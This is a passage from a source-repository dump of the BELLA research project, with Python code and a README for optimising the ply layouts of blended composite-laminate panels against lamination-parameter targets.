"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for panels\r\n\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\n\r\nclass Panel():\r\n \"\"\"\r\n Class for panels\r\n \"\"\"\r\n def __init__(self,\r\n ID,\r\n constraints,\r\n n_plies,\r\n lampam_target=np.array([]),\r\n lampam_weightings=np.ones((12,), float),\r\n area=0,\r\n length_x=0,\r\n length_y=0,\r\n N_x=0,\r\n N_y=0,\r\n weighting=1,\r\n neighbour_panels=[]):\r\n \"\"\"\r\n Create object for storing information concerning a panel:\r\n - n_plies: target number of plies\r\n - lampam_target: lamination-parameter targets\r\n - lampam_weightings: lamination-parameter weightings in panel objective\r\n function\r\n - weighting: panel weighting in the multi-panel objecive function\r\n - area: panel area\r\n - length_x: panel length (x-direction)\r\n - length_y: panel width (y-direction)\r\n - N_x: loading intensity in the x-direction\r\n - N_y: loading intensity in the y-direction\r\n - neighbour_panels: list of the neighbour panels' indices\r\n - constraints: design and manufacturing constraints\r\n - parameters: parameters of the optimiser\r\n \"\"\"\r\n # set the number of plies and the number of a potential middle ply\r\n # for symmetric laminates\r\n self.set_n_plies(n_plies, constraints)\r\n\r\n # lamination-parameter targets\r\n self.lampam_target = lampam_target\r\n\r\n # panel ID\r\n self.ID = ID\r\n\r\n # list of the neighbour panels' indices\r\n self.neighbour_panels = neighbour_panels\r\n\r\n # panel area\r\n self.area = area\r\n self.length_x = length_x\r\n self.length_y = length_y\r\n if not isinstance(area, (float, int)):\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel area must be a number!\r\n\"\"\")\r\n if area < 0:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel area must be positive!\r\n\"\"\")\r\n if not isinstance(length_x, (float, int)):\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel length (length_x) must be a number!\r\n\"\"\")\r\n if length_x < 0:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel length (length_x) must be positive!\r\n\"\"\")\r\n if not isinstance(length_y, (float, int)):\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel length (length_y) must be a number!\r\n\"\"\")\r\n if length_y < 0:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel length (length_y) must be positive!\r\n\"\"\")\r\n if length_x != 0 and length_y != 0:\r\n self.area = length_x * length_y\r\n\r\n # panel loading conditions\r\n self.N_x = N_x\r\n self.N_y = N_y\r\n\r\n # panel weighting in the multi-panel objective function\r\n self.weighting = weighting # initial value\r\n if not isinstance(weighting, (float, int)):\r\n raise PanelDefinitionError(\"\"\"\r\nThe panel weighting in the multi-panel objective function must a number!\r\n\"\"\")\r\n if weighting < 0:\r\n raise PanelDefinitionError(\"\"\"\r\nThe panel weighting in the multi-panel objective function must be positive!\r\n\"\"\")\r\n\r\n # lamination-parameter weightings in panel objective function\r\n if not(isinstance(lampam_weightings, np.ndarray)) \\\r\n and lampam_weightings.size == 12 \\\r\n and lampam_weightings.dtype == float:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, lampam_weightings must be a vector with 12 float components!\r\n\"\"\")\r\n if [False for elem in lampam_weightings if elem 
< 0]:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the elements of lampam_weightings must be positive!\r\n\"\"\")\r\n self.lampam_weightings_ini = lampam_weightings\r\n\r\n def filter_target_lampams(self, constraints, obj_func_param):\r\n \"\"\"\r\n filters applied to the lamination parameters to account for orthotropy\r\n requirements\r\n \"\"\"\r\n # If symmetry is desired, the corresponding target amination parameters\r\n # must be set to 0\r\n if constraints.sym:\r\n self.lampam_target[4:8] = 0\r\n self.lampam_target[4:8] = 0\r\n # If the balance rule is desired, the corresponding target\r\n # lamination parameters must be set to 0\r\n if constraints.bal:\r\n self.lampam_target[2] = 0\r\n self.lampam_target[3] = 0\r\n # If the out-of-plane orthotropy is desired, the corresponding target\r\n # lamination parameters must be set to 0\r\n if constraints.oopo:\r\n self.lampam_target[10] = 0\r\n self.lampam_target[11] = 0\r\n\r\n def filter_lampam_weightings(self, constraints, obj_func_param):\r\n \"\"\"\r\n filter of the lamination-parameter weighting in the panel\r\n objective function to account for the design guidelines\r\n\r\n# lampam_weightings_3: for blending steps 3 (contain penalty for\r\n# out-of-plane orthotropy and may contain penalty for balance)\r\n lampam_weightings: for all other blending steps (contain penalty for\r\n out-of-plane orthotropy and does not contain penalty for balance)\r\n \"\"\"\r\n lampam_weightings = np.copy(self.lampam_weightings_ini)\r\n\r\n # filter for zero lamination parameters factors\r\n if constraints.sym:\r\n lampam_weightings[4:8] = 0\r\n if set(constraints.set_of_angles) == set([0, 45, -45, 90]):\r\n lampam_weightings[3] = 0\r\n lampam_weightings[7] = 0\r\n lampam_weightings[11] = 0\r\n\r\n # modifying lamination parameter factor for orthotropy requirements\r\n if constraints.bal:\r\n lampam_weightings[2] = 0\r\n lampam_weightings[3] = 0\r\n if constraints.oopo:\r\n lampam_weightings[10] = 0\r\n lampam_weightings[11] = 0\r\n\r\n mean = np.average(lampam_weightings[lampam_weightings != 0])\r\n\r\n if constraints.oopo:\r\n if set(constraints.set_of_angles) == set([0, 45, -45, 90]):\r\n lampam_weightings[10] = mean * obj_func_param.coeff_oopo\r\n else:\r\n lampam_weightings[10] = mean * obj_func_param.coeff_oopo\r\n lampam_weightings[11] = mean * obj_func_param.coeff_oopo\r\n\r\n# if constraints.bal and obj_func_param.penalty_ipo_switch\r\n# and (obj_func_param.penalty_bal_ipo_switch_mp or\r\n# (not obj_func_param.penalty_bal_ipo_switch_mp and is_thick)):\r\n#\r\n# lampam_weightings_3 = np.copy(lampam_weightings)\r\n#\r\n# if constraints.bal and obj_func_param.penalty_ipo_switch:\r\n# if set(constraints.set_of_angles) == set([0, 45, -45, 90]):\r\n# lampam_weightings_3[2] = mean * obj_func_param.coeff_bal_ipo\r\n# else:\r\n# lampam_weightings_3[2] = mean * obj_func_param.coeff_bal_ipo\r\n# lampam_weightings_3[3] = mean * obj_func_param.coeff_bal_ipo\r\n#\r\n# if constraints.oopo:\r\n# if set(constraints.set_of_angles) == set([0, 45, -45, 90]):\r\n# lampam_weightings_3[10] = mean * obj_func_param.coeff_oopo\r\n# else:\r\n# lampam_weightings_3[10] = mean * obj_func_param.coeff_oopo\r\n# lampam_weightings_3[11] = mean * obj_func_param.coeff_oopo\r\n#\r\n# self.sum_lampam_weightings_3 = np.sum(lampam_weightings_3)\r\n# self.lampam_weightings_3 \\\r\n# = lampam_weightings_3 / self.sum_lampam_weightings_3\r\n\r\n# if not np.allclose(lampam_weightings, self.lampam_weightings_ini):\r\n# print(f\"\"\"\r\n#The lamination-parameter weightings have been 
modified (before normalisation):\r\n#{self.lampam_weightings_ini} -> {lampam_weightings}\r\n# \"\"\")\r\n\r\n self.sum_lampam_weightings = np.sum(lampam_weightings)\r\n self.lampam_weightings = lampam_weightings \\\r\n / self.sum_lampam_weightings\r\n\r\n self.lampam_weightingsA = self.lampam_weightings[0:4]\r\n self.lampam_weightingsD = self.lampam_weightings[8:12]\r\n\r\n def set_n_plies(self, n_plies, constraints):\r\n \"\"\"\r\n returns the number of plies of a laminate\r\n and the number of a its potential middle ply (0 otherwise)\r\n \"\"\"\r\n\r\n if not isinstance(n_plies, int):\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the number of plies in the panel must be an integer!\"\"\")\r\n if n_plies < 1:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the number of plies in the panel must be positive!\"\"\")\r\n middle_ply_index = 0\r\n self.has_middle_ply = False\r\n if constraints.sym:\r\n if n_plies % 2 == 1:\r\n middle_ply_index = int((n_plies + 1)/2)\r\n self.has_middle_ply = True\r\n self.n_plies, self.middle_ply_index = n_plies, middle_ply_index\r\n\r\n# if constraints.sym and self.middle_ply_index != 0:\r\n# raise PanelDefinitionError(\"\"\"\r\n#Attention, the number of plies in the panel must be even for\r\n#guide-based-blending !\"\"\")\r\n\r\n return 0\r\n\r\n def calc_weight(self, density_area):\r\n \"\"\"\r\nreturns the weight of a panel\r\n \"\"\"\r\n return density_area*self.area*self.n_plies\r\n\r\n\r\n def show(self):\r\n \" Display object - non verbose verisn or __repr__\"\r\n return f\"\"\"\r\nPanel ID : {self.ID}\r\nNumber of plies : {self.n_plies}\r\n\"\"\"\r\n\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n to_disp = ''\r\n # Lamination-parameter targets\r\n if np.array(self.lampam_target).size:\r\n to_disp = to_disp \\\r\n + 'Lamination-parameter targets : ' \\\r\n + str(self.lampam_target) + '\\n'\r\n\r\n # Lamination-parameter weighting in the panel objective function\r\n if hasattr(self, 'lampam_weightings2'):\r\n to_disp = to_disp \\\r\n + \"\"\"\r\nFinal lamination-parameter weighting in the panel objective function: :\r\n A : {self.lampam_weightings2[0:4]}\r\n B : {self.lampam_weightings2[4:8]}\r\n D : {self.lampam_weightings2[8:12]}\r\n \"\"\"\r\n\r\n return f\"\"\"\r\nPanel ID : {self.ID}\r\nNumber of plies : {self.n_plies}\r\nNeighbour panel IDs: {self.neighbour_panels}\r\nLength in the x-direction : {self.length_x}\r\nLength in the y-direction : {self.length_y}\r\nArea : {self.area}\r\nWeighting in multi-panel objective funcion : {self.weighting}\r\nLoad intensity in th x-direction : {self.N_x}\r\nLoad intensity in th y-direction : {self.N_y}\r\nPosition of potential middle ply : {self.middle_ply_index}\r\n \"\"\" + to_disp\r\n\r\n#Lamination-parameter weighting in the panel objective function:\r\n# during blending steps 3 and 4.1\r\n# A : {self.lampam_weightings[0:4]}\r\n# B : {self.lampam_weightings[4:8]}\r\n# D : {self.lampam_weightings[8:12]}\r\n# during blending steps 4.2 and 4.3\r\n# A : {self.lampam_weightings2[0:4]}\r\n# B : {self.lampam_weightings2[4:8]}\r\n# D : {self.lampam_weightings2[8:12]}\r\n\r\n\r\nclass PanelDefinitionError(Exception):\r\n \" Errors during the definition of a panel\"\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the class Panel ***\\n')\r\n constraints = Constraints(sym=True)\r\n panel1 = Panel(1, constraints, n_plies=12)\r\n print(panel1)\r\n"
},
{
"alpha_fraction": 0.5832300782203674,
"alphanum_fraction": 0.5873606204986572,
"avg_line_length": 33.09859085083008,
"blob_id": "680f0832feba1c2ce1f394c481597ffcdb88e03e",
"content_id": "52abc1b60e9934cb88cba20f38ef6b68fdf19074",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2422,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 71,
"path": "/README.md",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# BELLA: a method to design blended multi-panel composite laminates with many plies and panels\n\n--------------------------------------------------------------------------\n\nThe files correspond to the PhD Thesis of Noémie Fedon.\n\nBELLA is a method for optimising the layout of composite laminate strucutres when panel \nthicknesses are fixed. The algorithm enforoces lay-up and ply-drop design guidelines and \noptimise panel convergence towards lamination-paramter targets.\n\n--------------------------------------------------------------------------\nRequirements:\n\n1. A python IDE running python 3.7+\n\n2. The following libraries should accessible:\n\n\t- matplotlib\n\t- pandas\n\t- numpy\n\n---------------------------------------------------------------------------\nIn order to use it:\n\n1. clone or download the repository in your desired folder.\n\n2. Set up your environment with the appropriate libraries.\n\n3. Change the settings and run one of the files used to test LAYLA: \nrun_BELLA.py, run_BELLA_from_input_file.py, run_BELLA_from_input_file_horseshoe.py \n\nRefer to the documentation for more details.\n--------------------------------------------------------------------------\nFolder Structure\n\n- src and subfolders contain the files needed to run the code\n\n- input-files contains the files storing the input-files used for testing LAYLA\n\n- results contains the results and analyses generated for the thesis.\n\n- FXI-results contains the results generated using the evolutionary algorithm of \nFrançois-Xavier Irisarri.\n\n- run_BELLA.py is used for to run BELLA without using an input-file.\n\n- run_BELLA_from_input_file.py is used for testing BELLA based on input-files.\n\n- run_BELLA_from_input_file_horseshoe.py is used for testing BELLA based on input-files \nspecific to the benchmark problem of composite-laminate design.\n\n--------------------------------------------------------------------------\nVersion 1.0.0\n\n--------------------------------------------------------------------------\nLicense\n\nThis project is licensed under the MIT License. See the LICENSE for details.\n\n--------------------------------------------------------------------------\nAcknowledgments\n\n- Terence Macquart, Paul Weaver and Alberto Pirrera, my PhD supervisors.\n\n--------------------------------------------------------------------------\nAuthor:\n\nNoémie Fedon\n\nFor any questions or feedback don't hesitate to contact me at: [email protected]\nor through github at https://github.com/noemiefedon/BELLA\n"
},
{
"alpha_fraction": 0.529891312122345,
"alphanum_fraction": 0.5760869383811951,
"avg_line_length": 25.33333396911621,
"blob_id": "1950ab9d82e05008c03a7b766d4cc60cdb7e1472",
"content_id": "12d27365de889eea6a1049a03dd12323875aa705",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 736,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 27,
"path": "/src/divers/test_arrays.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis module test the functions for manipulating and combining Python arrays.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport pytest\r\nimport numpy as np\r\n\r\nfrom arrays import max_arrays\r\n\r\[email protected](\r\n \"array1, array2, expect\", [\r\n (np.array([1]), np.array([4, 3, 5]), np.array([4, 3, 5])),\r\n (np.array([1, 2, 3]), np.array([4, 3, 5]), np.array([4, 3, 5]))\r\n ])\r\n\r\ndef test_max_arrays(array1, array2, expect):\r\n output = max_arrays(array1, array2)\r\n assert (output == expect).all()\r\n\r\ndef test_max_arrays_error():\r\n array1 = np.array([1, 2])\r\n array2 = np.array([1, 2, 3])\r\n with pytest.raises(ValueError):\r\n max_arrays(array1, array2)"
},
{
"alpha_fraction": 0.5201858878135681,
"alphanum_fraction": 0.5739542245864868,
"avg_line_length": 35.578765869140625,
"blob_id": "54b2486c94416a0191ada2751dc1950e00875053",
"content_id": "8094363db9b7de721fd564203cde21e8b6c68f02",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10973,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 292,
"path": "/src/RELAY/repair_membrane_1_no_ipo.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- calc_objA_options\r\n calculates the possible in-plane objective function values achievable by\r\n modifying one fibre orientation\r\n\r\n- calc_objA_options_3\r\n calculates the possible in-plane objective function values achievable by\r\n modifying one fibre orientation\r\n\r\n \"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.sorting import sortAccording\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.divers.pretty_print import print_ss\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.RELAY.repair_10_bal import calc_mini_10\r\nfrom src.RELAY.repair_tools import RepairError\r\n\r\ndef repair_membrane_1_no_ipo(\r\n ss_ini, ply_queue_ini, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints):\r\n \"\"\"\r\n repair for membrane properties only accounting for one panel when the\r\n laminate does not have to remain balanced\r\n\r\n modifies the stacking sequence to converge towards the in-plane target\r\n lamination parameters. The modifications preserves the satisfaction to the\r\n 10% rule, to the balance requirements and to the damage tolerance\r\n constraints.\r\n\r\n The fibre orientations are modified one by one.\r\n\r\n INPUTS\r\n\r\n - ss_ini: partially retrieved stacking sequence\r\n - ply_queue_ini: queue of plies for innermost plies\r\n - mini_10: number of plies required for the 10 % rule in the 0/90/45/-45\r\n fibre directions\r\n - in_plane_coeffs: coefficients in the in-plane objective function\r\n - p_A: coefficient for the proportion\r\n of the laminate thickness that can be modified during the repair\r\n for membrane properties\r\n - lampam_target: lamination parameter targets\r\n - constraints: design and manufacturing constraints\r\n - p_A: coefficient for the\r\n proportion of the laminate thickness that can be modified during the repair\r\n for membrane properties\r\n \"\"\"\r\n n_plies = ss_ini.size\r\n\r\n ss = np.copy(ss_ini)\r\n ply_queue = ply_queue_ini[:]\r\n\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n objA = sum(in_plane_coeffs * ((lampamA - lampam_target[0:4]) ** 2))\r\n# print('objA', objA)\r\n\r\n ss_list = [np.copy(ss)]\r\n ply_queue_list = [ply_queue[:]]\r\n lampamA_list = [lampamA]\r\n objA_list = [objA]\r\n\r\n excess_10 = calc_excess_10(ss, ply_queue, mini_10, constraints.sym)\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints, p_A)\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_3(n_plies, constraints)\r\n objA_options = calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints, in_plane_coeffs)\r\n# print('objA_options', objA_options)\r\n\r\n while np.min(objA_options) + 1e-20 < objA and objA > 1e-10:\r\n # attempts at modifying a couple of angled plies\r\n ind_angle1, ind_angle2 = np.unravel_index(\r\n np.argmin(objA_options, axis=None), objA_options.shape)\r\n angle1 = constraints.set_of_angles[ind_angle1]\r\n angle2 = constraints.set_of_angles[ind_angle2]\r\n# print('test angle1', angle1, 'to angle2', angle2)\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # 
if no ply to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n # take care not to break the 10% rule\r\n if angle1 == 0:\r\n if excess_10[0] < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n excess_10[0] -= 1\r\n elif angle1 == 90:\r\n if excess_10[1] < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n excess_10[1] -= 1\r\n elif angle1 == 45:\r\n if excess_10[2] < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n excess_10[2] -= 1\r\n elif angle1 == -45:\r\n if excess_10[3] < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n excess_10[3] -= 1\r\n\r\n# print(angle1, ' plies changed into ', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n if angle2 == 0:\r\n excess_10[0] += 1\r\n elif angle2 == 90:\r\n excess_10[1] += 1\r\n elif angle2 == 45:\r\n excess_10[2] += 1\r\n elif angle2 == -45:\r\n excess_10[3] += 1\r\n\r\n lampamA += lampamA_options[ind_angle2] - lampamA_options[ind_angle1]\r\n objA = objA_options[ind_angle1, ind_angle2]\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n# print('objA', objA)\r\n if objA < 1e-10:\r\n break\r\n\r\n objA_options = calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints,\r\n in_plane_coeffs)\r\n# print('objA_options', objA_options)\r\n\r\n return ss_list, ply_queue_list, lampamA_list, objA_list\r\n\r\n\r\n\r\ndef calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints, in_plane_coeffs):\r\n \"\"\"\r\n calculates the possible in-plane objective function values achievable by\r\n modifying one fibre orientation\r\n\r\n objA_options[ind_pos_angle1, ind_pos_angle2] for angle1 ply changed\r\n to angle2 plies\r\n \"\"\"\r\n objA_options = 1e10 * np.ones((constraints.n_set_of_angles,\r\n constraints.n_set_of_angles), float)\r\n for ind_pos_angle1 in range(constraints.n_set_of_angles):\r\n for ind_pos_angle2 in range(constraints.n_set_of_angles):\r\n if ind_pos_angle1 == ind_pos_angle2:\r\n continue\r\n objA_options[ind_pos_angle1, ind_pos_angle2] = sum(\r\n in_plane_coeffs * ((\r\n lampamA \\\r\n - lampamA_options[ind_pos_angle1] \\\r\n + lampamA_options[ind_pos_angle2] \\\r\n - lampam_target[0:4])**2))\r\n return objA_options\r\n\r\n\r\ndef calc_excess_10(ss, ply_queue, mini_10, sym):\r\n \"\"\"\r\nreturns the excess numbers of plies in the 0/90/+45/-45 directions over the\r\nminimum ply counts required by the 10% rule\r\n\r\n INPUTS\r\n\r\n ss: stacking sequence (array)\r\n ply_queue: queue of plies for the innermost plies\r\n mini_10: minimum ply counts required by the 10% rule in the 0/90/45/-45\r\ndirections\r\n sym: True for symmetric laminates (boolean)\r\n \"\"\"\r\n ply_queue = np.array(ply_queue)\r\n current_10 = np.zeros((5,), float)\r\n if sym:\r\n lenn = ss.size // 2\r\n current_10[0] = sum(ss[:lenn] == 0) + sum(ply_queue == 0)\r\n current_10[1] = sum(ss[:lenn] == 90) + sum(ply_queue == 90)\r\n current_10[2] = sum(ss[:lenn] == 45) + sum(ply_queue == 45)\r\n current_10[3] = sum(ss[:lenn] == -45) + sum(ply_queue == -45)\r\n current_10[4] = current_10[2] + current_10[3]\r\n if ss.size % 2:\r\n if ss[lenn] == 0:\r\n current_10[0] += 1/2\r\n elif ss[lenn] == 90:\r\n current_10[1] += 1/2\r\n else:\r\n raise RepairError(\"\"\"\r\nThis should not happen: a ply at the middle surface has a fibre orientation\r\nother than 0 or 90 deg\"\"\")\r\n else:\r\n current_10[0] = sum(ss == 0) + sum(ply_queue == 0)\r\n current_10[1] = sum(ss == 90) + sum(ply_queue == 90)\r\n current_10[2] = sum(ss == 45) + sum(ply_queue == 45)\r\n current_10[3] = sum(ss == -45) + sum(ply_queue == -45)\r\n current_10[4] = current_10[2] + current_10[3]\r\n return current_10 - mini_10\r\n\r\nif __name__ == \"__main__\":\r\n\r\n print('\\n\\n*** Test for the function calc_excess_10 ***')\r\n constraints = Constraints(\r\n sym=True,\r\n ipo=True,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=10,\r\n percent_90=10,\r\n percent_135=10,\r\n set_of_angles=[0, 45, 30, -30, -45, 60, -60, 90])\r\n ss = np.array([0, 45, 666, 666, 666, 666, 666, 666, 666,\r\n 666, 666, 666, 666, 666, 666, 666, 45, 0], int)\r\n ply_queue = [90, 90, -45, 90, 90, 45, 0]\r\n mini_10 = calc_mini_10(constraints, ss.size)\r\n print('\\nInitial stacking sequence')\r\n print_ss(ss, 40)\r\n excess_10 = calc_excess_10(ss, ply_queue, mini_10, sym=constraints.sym)\r\n print('\\nexcess_10', excess_10)\r\n\r\n print('\\n*** Test for the function repair_membrane_1_no_ipo ***')\r\n constraints = Constraints(\r\n sym=True,\r\n ipo=False,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=10,\r\n percent_90=10,\r\n percent_135=10,\r\n set_of_angles=[0, 45, -45, 90])\r\n# set_of_angles=[0, 45, 30, -30, 60, -60, -45, 90])\r\n p_A = 100\r\n in_plane_coeffs = np.array([1, 1, 0, 0])\r\n ss_target = np.array([0], int)\r\n print('\\nTarget stacking sequence')\r\n print_ss(ss_target, 40)\r\n lampam_target = calc_lampam(ss_target)\r\n ss = np.array([0, 45, 666, 666, 666, 666, 666, 666, 666,\r\n 666, 666, 666, 666, 666, 666, 666, 45, 0], int)\r\n ply_queue = [90, 90, -45, 90, 90, 45, 0]\r\n# ss = np.array([60, 45, 0, 0, 30, 0, -30,\r\n# -30, 0, 30, 0, 0, 45, 60], int)\r\n# ply_queue = []\r\n print('\\nInitial stacking sequence')\r\n print_ss(ss, 40)\r\n mini_10 = calc_mini_10(constraints, ss.size)\r\n ss_list, ply_queue_list, lampamA_list, objA_list = repair_membrane_1_no_ipo(\r\n ss, ply_queue, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints)\r\n print('\\nSolution stacking sequences')\r\n for index in range(len(ss_list)):\r\n print_ss(ss_list[index], 20)\r\n print(ply_queue_list[index], 20)\r\n"
},
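The repair routine above is greedy: at each pass it evaluates every possible single-ply reorientation (angle1 changed to angle2) and applies the one that most reduces the weighted in-plane objective. Below is a minimal standalone sketch of that selection step; the toy lampamA_options matrix stands in for the per-angle lamination-parameter contributions that BELLA's calc_lampamA_options_3 would compute, so all numbers are illustrative only.

# Sketch of the greedy selection step in repair_membrane_1_no_ipo: pick the
# swap (angle1 -> angle2) that best reduces the weighted in-plane objective.
# lampamA_options holds toy per-angle contributions (one row per angle).
import numpy as np

set_of_angles = np.array([0, 45, -45, 90])          # candidate fibre angles
in_plane_coeffs = np.array([1.0, 1.0, 0.0, 0.0])    # objective weights
lampam_target = np.array([0.2, 0.1, 0.0, 0.0])      # in-plane LP targets
lampamA = np.array([0.0, 0.3, 0.0, 0.0])            # current in-plane LPs

rng = np.random.default_rng(0)
lampamA_options = 0.1 * rng.standard_normal((4, 4)) # toy per-angle LP terms

n = set_of_angles.size
objA_options = 1e10 * np.ones((n, n))
for i1 in range(n):                 # angle removed
    for i2 in range(n):             # angle added
        if i1 == i2:
            continue
        new_lampamA = lampamA - lampamA_options[i1] + lampamA_options[i2]
        objA_options[i1, i2] = in_plane_coeffs @ (new_lampamA - lampam_target) ** 2

i1, i2 = np.unravel_index(np.argmin(objA_options), objA_options.shape)
print('best swap:', set_of_angles[i1], '->', set_of_angles[i2],
      'objective', objA_options[i1, i2])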
{
"alpha_fraction": 0.6522427797317505,
"alphanum_fraction": 0.6737300753593445,
"avg_line_length": 37.30350112915039,
"blob_id": "bbc61045830b15a85973604c987cdfab6ff043d6",
"content_id": "bb2fa56bb3eda62110e91d0fad9640863c2a1a6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10099,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 257,
"path": "/FXI-results/format_restults_FXI_horseshoe.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script formats the results of blending optimisations the optimiser of\r\nFrancois-Xavier Irisarri\r\n\"\"\"\r\n\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.results import BELLA_Results\r\nfrom src.BELLA.results import BELLA_ResultsOnePdl\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.guidelines.ipo_oopo import calc_penalty_oopo_ss\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo\r\nfrom src.guidelines.contiguity import calc_penalty_contig_mp\r\nfrom src.guidelines.disorientation import calc_number_violations_diso_mp\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.ten_percent_rule import calc_ply_counts\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel, save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.BELLA.save_result import save_result_BELLAs\r\nfrom src.divers.excel import delete_file, autofit_column_widths\r\n\r\nfilename = 'horseshoe.xlsx'\r\n# filename = 'horseshoe2.xlsx'\r\nfilename_input = '/BELLA/input-files/input_file_' + filename\r\nfilename_FXI = '/BELLA/FXI-results/result_FXI_' + filename\r\nfilename_res = 'results_FXI_' + filename\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename_res)\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\ndata_constraints = pd.read_excel(filename_input, sheet_name='Constraints',\r\n header=None, index_col=0).T\r\nsym = data_constraints[\"symmetry\"].iloc[0]\r\nbal = data_constraints[\"balance\"].iloc[0]\r\noopo = data_constraints[\"out-of-plane orthotropy\"].iloc[0]\r\ndam_tol = data_constraints[\"damage tolerance\"].iloc[0]\r\ndam_tol_rule = 